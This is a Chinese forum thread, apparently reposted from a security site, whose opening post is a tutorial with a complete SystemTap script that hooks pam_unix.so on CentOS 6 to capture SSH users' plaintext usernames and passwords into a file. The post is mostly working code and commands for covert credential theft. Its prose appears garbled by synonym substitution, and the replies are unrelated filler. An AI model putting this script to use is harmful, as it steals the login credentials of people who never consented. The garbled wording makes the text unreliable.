仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 1121|回复: 9
打印 上一主题 下一主题

[CentOS(社区)] 带来一篇centos6.x 抓取ssh登录的用户名和暗码

[复制链接]
兰色精灵 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-1-14 20:10:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
如果您觉得本篇CentOSLinux教程讲得好,请记得点击右边漂浮的分享程序,把好文章分享给你的小伙伴们!systemtap是一款十分壮大内核调试工具,能够debug良多关于kernel层的成绩。Linux是经由过程PAM模块检测用户信息和认证信息的,从而断定一个用户是不是能够登录体系,使用这个常识点,利用systemtap捕捉一下pam_unix.so该静态库文件的函数挪用,取得用户在ssh近程登录时的用户名和暗码吧。
测试情况:CentOS6.432bit
内核版本:2.6.32-358.el6.i686
起首装置以下rpm包
yum--releasever=6.4update

yuminstall-ysystemtap
debuginfo-install$(rpm-qf/lib/security/pam_unix.so)
创立文件,写进以下代码
touch/root/capture_pass.stp

·#!/usr/bin/stap
·globalusername,pass,isSuccRet=1;
·probeprocess("/lib/security/pam_unix.so").function("_unix_verify_password")
·{
·username=user_string($name);
·pass=user_string($p);
·}
·probeprocess("/lib/security/pam_unix.so").function("_unix_verify_password").return
·{
·if($return==0)
·{
·printf("User:%s
Password:%s

",username,pass);

·isSuccRet=0;
·}
·}
·probeprocess("/lib/security/pam_unix.so").function("pam_sm_open_session")
·{
·if(isSuccRet!=0)
·{
·printf("Loginviasshservice.
User:%s
Password:%s

",username,pass);

·}
·isSuccRet=1;
·}
付与可实行权限
chmod+xcapture_pass.stp
创立一个纪录暗码的文件
touchpassword.txt
实行systemstap剧本
stapcapture_pass.stp-opassword.txt



当地实行capture_pass.stp剧本,同时ssh近程登录体系,即便第一次登录失利也没有成绩,不会纪录实验输出的毛病暗码。登录乐成后ctl+C停止剧本运转,检察password.txt,乐成捕捉。systemstap很壮大的利器,以是只要超户可使用。







来自:https://forum.90sec.org
如果您觉得本篇CentOSLinux教程讲得好,请记得点击右边漂浮的分享程序,把好文章分享给你的好朋友们!
灵魂腐蚀 该用户已被删除
沙发
发表于 2015-1-14 22:10:21 | 只看该作者

带来一篇centos6.x 抓取ssh登录的用户名和暗码

有空一起交流一下
因胸联盟 该用户已被删除
板凳
发表于 2015-1-19 06:45:14 | 只看该作者
如果上面的措施没有解决问题,此时你就需要Linux社区的帮助了。 Linux的使用者一般都是专业人士,他们有着很好的电脑背景且愿意协助他人。
小魔女 该用户已被删除
地板
发表于 2015-1-28 05:46:44 | 只看该作者
我学习Linux的心得体会 ,希望对大家的学习有所帮助,由于水平有限,本文难免有所欠缺,望请指正。
海妖 该用户已被删除
5#
发表于 2015-2-5 19:13:03 | 只看该作者
掌握硬件配置,如显卡,声卡,网卡等,硬件只要不是太老或太新一般都能被支持,作为一名Linux系统管理员建议多阅读有关硬件配置文章,对各种不支持或支持不太好的硬件有深刻的了解。
小妖女 该用户已被删除
6#
发表于 2015-2-13 07:02:05 | 只看该作者
学习Linux应具备的。[书籍+网络资源]
谁可相欹 该用户已被删除
7#
发表于 2015-3-3 19:11:58 | 只看该作者
随着实验课程的结束,理论课也该结束了,说实话教OS的这两位老师是我们遇到过的不错的老师(这话放这可能不太恰当).
爱飞 该用户已被删除
8#
发表于 2015-3-11 13:43:21 | 只看该作者
目前全球有超过一百多个Linux发行版本,在国内也能找到十几个常见版本。如何选择请根据你的需求和能力,RedhatLinux和DebianLinux是网络管理员的理想选择。
兰色精灵 该用户已被删除
9#
 楼主| 发表于 2015-3-19 01:43:30 | 只看该作者
主流Linux发行版都自带非常详细的文档(包括手册页和FAQ),从系统安装到系统安全,针对不同层次的人的详尽文档,仔细阅读文档后40%问题都可在此解决。
若相依 该用户已被删除
10#
发表于 2015-3-27 03:09:52 | 只看该作者
感谢老师和同学们在学习上对我的帮助。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-12-23 08:25

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表